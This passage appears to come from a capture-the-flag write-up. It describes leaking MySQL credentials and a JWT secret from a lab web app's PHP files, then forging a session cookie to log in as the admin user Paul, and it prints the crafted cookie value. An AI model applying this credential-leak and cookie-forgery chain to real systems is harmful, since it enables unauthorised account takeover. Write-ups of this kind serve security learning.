Leaking Secrets and User Configurations
MySQL login creds
From the db.php
file, we manage to leak the MySQL login username and password.
However, MySQL does not allow remote access. We have to search for other methods.
Both the portal and the book search site shares the same database authentication credentials.
JWT secret leaked
Login requirements
Based on the PHP Code logic, we need to login as Paul
as documented in portal/includes/fileController.php
.
Leaked Cookie generation method
Going further into portal/cookie.php
, we found the method to generate the PHP Session cookie using a fixed secret that should be changed every week.
By bruteforcing all 4 characters of Paul
, we managed to find that the letter l
seems to be the correct letter.
We can concat the username paul
with the MD5 of the hardcoded secret, replacing the random character with l
which would yield the cookie: paul47200b180ccd6835d25d034eeb6e6390
After crafting the JWT Token and PHPSESSID cookie, we can login as Paul
in the admin portal.